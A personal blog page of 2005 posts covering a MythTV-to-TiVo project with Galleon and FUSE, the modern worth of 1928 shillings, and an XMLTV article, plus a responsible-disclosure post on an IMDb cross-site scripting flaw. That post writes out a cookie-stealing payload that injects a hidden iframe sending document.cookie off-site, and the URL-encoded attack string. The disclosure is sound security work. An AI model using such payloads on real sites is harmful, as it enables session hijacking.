Every few years, I end up relearning Java for some project or another. Today, that project is Galleon, the fantastic TiVo Home Media Server. I’ve been sort of mildly involved in another person’s attempts to get MythTV and his TiVo working nicely together.

The basic situation is this: I want to be able to watch stuff I’ve recorded on my MythTV box via my TiVo. Galleon already does this.

Using the “GoBack” TiVo feature, Galleon acts like another TiVo on the network, and sends a show to the TiVo. Normally this is used to send a .TiVo file from your computer back to the TiVo. In the case of TiVo-to-TiVo communication, they include the metadata about the show (title, air date, duration, description, etc) before starting the data transfer. Galleon stores the metadata to a local database when it downloads shows via the ToGo feature.

It is possible to send any valid MPEG stream to the TiVo, but unless the Galleon database has metadata for the show, there will be nothing but the filename on the TiVo end when it transfers. In the case of MythTV shows, the metadata is contained in the MythTV database. I’m hoping to create a MythTV “application” for Galleon that will connect to the MythTV database, and populate the TiVo with the needed metadata.

Since I’m so green on Java, I’m doing something else as a “proof-of-concept”. It was suggested that some of the metadata could be encoded into the filename. This requires two halves: a parser in Galleon to extract the data, and the files to be named with their metadata encoded.

On the Galleon side, I’m digging around with the StringTokenizer, and generally getting my feet wet with the Galleon source and banging my head on the java compiler.

On the filesystem side, I’m going to use FUSE to create an overlay filesystem that queries the MythTV database, and builds a list of files based on an NFS mount’s contents. (Which I’ll NFS mount from my MythTV box.)

Mostly I just wanted to write a FUSE application. :)

© 2005 – 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

December 12, 2005

historical exchange rates

Filed under: General — kees @ 11:07 pm

Tonight I discovered that finding out the historical worth of money is a little tricky to calculate. :) On Poirot tonight, he bought 19 pairs of silk stockings in order to trap a thief. The clerk kept warning him that they were “very expensive”. The final bill was 35 shillings per pair. I thought this was rather odd that a value not involving pounds would be considered “very expensive”. Feeling very detective-oriented, I had to investigate.

First of all, I found a nice conversion chart for British currency. 35 shillings is 1.75 pounds. The story took place in roughly 1928, but that doesn’t change the shillings calculation because even after the decimalization in 1971, shillings and pounds kept their 20-to-1 ratio.

Trying to find “current worth” of historical monies was a little more difficult. I found the How Much Is That? site, and it seems that 1.75 pounds is worth about $95 in present day. Good stockings are about $15 a pair now, and since nylon was invented in 1935, it doesn’t seem unreasonable that good stockings would be about 10 times more expensive in 1928.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

xmltv article

Filed under: Multimedia — kees @ 11:59 am

My friend Brian just had his article-writing debut on O’Reilly‘s ONLamp site. He wrote about how to use XMLTV to help manage your TV viewing schedules if you don’t have a DVR doing it for you (or not doing it well enough).

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

October 31, 2005

imdb xss

Filed under: Security,Vulnerabilities — kees @ 10:43 pm

Last week I discovered a cross-site scripting vulnerability in IMDb’s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the “to-be-displayed” location on the URL, and didn’t quote HTML entities. I was able to steal my own cookies and log in with my IMDb account from another computer. Last Wed, I reported it:

26 Oct 2005 10:29:59 PM

It seems your service is vulnerable to cross-site scripting (XSS). Since you
have login information stored as cookies, it’s possible for people to trick
others into exposing their logins. As an example, this displays your cookies to
you in your browser:;%3Cscript%3Ealert(document.cookie)%3C/script%3E

Please let me know if you have any questions. I love using IMDb, and thought
you might want to make yourselves more secure.


At 9am today, they had fixed it:

31 Oct 2005 09:01:17 AM
Thank you for your feedback about the Internet Movie Database.

The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.

We appreciate that you took the time to share your thoughts with us. It has now been fixed.

Thank you for your support!

The IMDb Help Desk

Another success for vulnerability reporting!

As for a concrete example, the “heading” argument to their search tool was being displayed. The harmless example I used above just pops an alert dialog. To actually pass the cookies off-site where it can be collected, I used an invisible IFRAME, and pulled a content-less document from my server. To do this, I wanted the following to appear on the IMDb page:

<iframe src=”” width=”0″ height=”0″ frameborder=”0″</iframe>

There are a number of ways to take the browser off-site. Another are the HTTP methods that get used in a lot of AJAX applications. I haven’t dug into using that, even though they’re way more powerful (since you don’t need to “hide” the results of an IFRAME, etc, if you don’t listen for the HTTP results, they just never get used — it’s only the “side-effect” of recording the cookie off-site that’s wanted). Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:

document.write(‘<iframe src=”’+document.cookie+'” width=”0″ height=”0″ frameborder=”0″</iframe>’)

And here it is, HTML-encoded, stuffed into the middle of the “header” argument to the search function, disguised as a search for filming locations in Vancouver, BC:,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&&heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write(‘%3Ciframe%20src=%22’%2Bdocument.cookie%2B’%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C/iframe%3E’)%3C/script%3E%20Canada

And if you click that, you can see their newly fixed entity-escaping. Again, kudos to IMDb! Additionally, it looks like they rearranged their search tool to not even use the “header” argument anymore. Neato.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

October 28, 2005

gcc extensions

Filed under: General — kees @ 7:30 am

Robert Love wrote up a great summary of GCC extensions. Recommended reading! This is exactly the kind of summary I’ve been hoping to run into. Maybe I can go through Inkscape adding all sorts of fun tags to functions and variables now. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

« Newer PostsOlder Posts »

Powered by WordPress